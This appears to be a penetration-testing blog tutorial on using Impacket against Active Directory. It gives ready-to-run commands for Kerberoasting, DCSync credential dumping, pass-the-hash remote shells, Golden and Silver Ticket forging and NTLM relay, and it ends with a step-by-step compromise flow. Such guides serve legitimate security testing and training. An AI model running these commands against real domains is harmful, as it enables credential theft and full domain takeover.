Ethical Hacking #impacket#active directory#penetration testing

Impacket Toolkit: Active Directory Attack Techniques

Master Impacket's suite of AD attack tools — GetUserSPNs, secretsdump, psexec, wmiexec, and more for penetration testing.

8 min read

Impacket is a collection of Python classes and scripts for working with network protocols, with a heavy focus on Windows and Active Directory environments. It’s a cornerstone of modern Active Directory penetration testing. This guide covers the most useful tools in the Impacket suite.

Installation

# Kali Linux (pre-installed)
impacket-secretsdump --help

# Manual install
pip3 install impacket

# Or from source (latest)
git clone https://github.com/fortra/impacket
cd impacket && pip3 install .

Scripts are typically prefixed with impacket- on Kali, or run directly as python3 script.py from source.

Kerberoasting: GetUserSPNs

Kerberoasting extracts service tickets for accounts with Service Principal Names (SPNs) and cracks them offline.

impacket-GetUserSPNs domain.local/user:password -dc-ip 192.168.1.10 -request

Output is a Kerberos TGS hash crackable with Hashcat:

hashcat -m 13100 -a 0 kerberoast.txt rockyou.txt -r rules/best64.rule

Without credentials (using LDAP anonymous bind if enabled):

impacket-GetUserSPNs domain.local/ -dc-ip 192.168.1.10 -no-pass

AS-REP Roasting: GetNPUsers

Targets accounts with Kerberos pre-authentication disabled:

# With a user list
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass

# Authenticated scan for all vulnerable accounts
impacket-GetNPUsers domain.local/user:password -dc-ip 192.168.1.10 -request

Crack the resulting AS-REP hashes:

hashcat -m 18200 asrep_hashes.txt rockyou.txt

SecretsDump: Dumping Credentials

One of the most powerful tools in Impacket. Dumps hashes from SAM, LSA, NTDS.dit, and DPAPI.

Remote dump (requires admin credentials)

impacket-secretsdump domain/admin:[email protected]

DC sync (domain admin required)

Replicates the NTDS.dit remotely without touching disk:

impacket-secretsdump domain.local/admin:password@dc-ip -just-dc
impacket-secretsdump domain.local/admin:password@dc-ip -just-dc-user krbtgt

This gives you the krbtgt hash for Golden Ticket attacks.

Pass-the-Hash with SecretsDump

impacket-secretsdump domain/[email protected] -hashes :NTLMhash

Remote Code Execution Tools

PSExec

Creates a service on the target for command execution:

impacket-psexec domain/admin:[email protected]
impacket-psexec domain/[email protected] -hashes :NTLMhash

This gives a SYSTEM shell but is very noisy (creates services, writes files).

WMIExec

Executes commands via WMI — noisier than smbexec but more reliable:

impacket-wmiexec domain/admin:[email protected]
impacket-wmiexec domain/[email protected] -hashes :NTLMhash cmd.exe

SMBExec

Quieter than PSExec — uses a temporary service but doesn’t drop a binary:

impacket-smbexec domain/admin:[email protected]

ATExec

Executes via the Task Scheduler service:

impacket-atexec domain/admin:[email protected] whoami

Ticket Attacks

Golden Ticket

Requires krbtgt hash (from DCSync). Creates a forgeable TGT valid for any account:

impacket-ticketer -nthash <krbtgt_hash> \
  -domain-sid S-1-5-21-xxxx-xxxx-xxxx \
  -domain domain.local \
  administrator

Use the ticket:

export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass domain.local/[email protected]

Silver Ticket

Forges a service ticket for a specific service using the service account hash:

impacket-ticketer -nthash <service_account_hash> \
  -domain-sid S-1-5-21-xxxx \
  -domain domain.local \
  -spn cifs/server.domain.local \
  administrator

Network Scanning and Enumeration

SMB Enumeration

# List shares
impacket-smbclient domain/user:[email protected]

# Inside smbclient
shares   # list shares
use C$   # mount C$ share
ls       # list files
get file.txt

LDAP Queries

# Dump AD users
impacket-ldapdomaindump -u domain/user -p password 192.168.1.10

# Output: domain_users.html, domain_computers.html, etc.

Relay Attacks

NTLMRelayx

Relay NTLM authentication to other targets (combine with Responder):

# Turn off SMB/HTTP in Responder, then run:
impacket-ntlmrelayx -tf targets.txt -smb2support

# Start Responder (on a different interface or with SMB off)
responder -I eth0 -rdw

When a victim authenticates to your Responder listener, ntlmrelayx relays it to the targets.

For interactive shell relay:

impacket-ntlmrelayx -tf targets.txt -smb2support -i

Then connect: nc 127.0.0.1 11000

Practical AD Pentest Flow with Impacket

  1. Enumerate SPNs with GetUserSPNs, crack offline
  2. Check for ASREPRoastable accounts with GetNPUsers
  3. Relay attacks if NTLM signing disabled (check with nmap --script smb2-security-mode)
  4. SecretsDump once you have local admin anywhere
  5. DCSync once you reach domain admin

Impacket scripts require a basic Python environment and work on Linux, macOS, and Windows. Keep it updated — it receives frequent improvements for new attack techniques.

#kerberos #penetration testing #active directory #impacket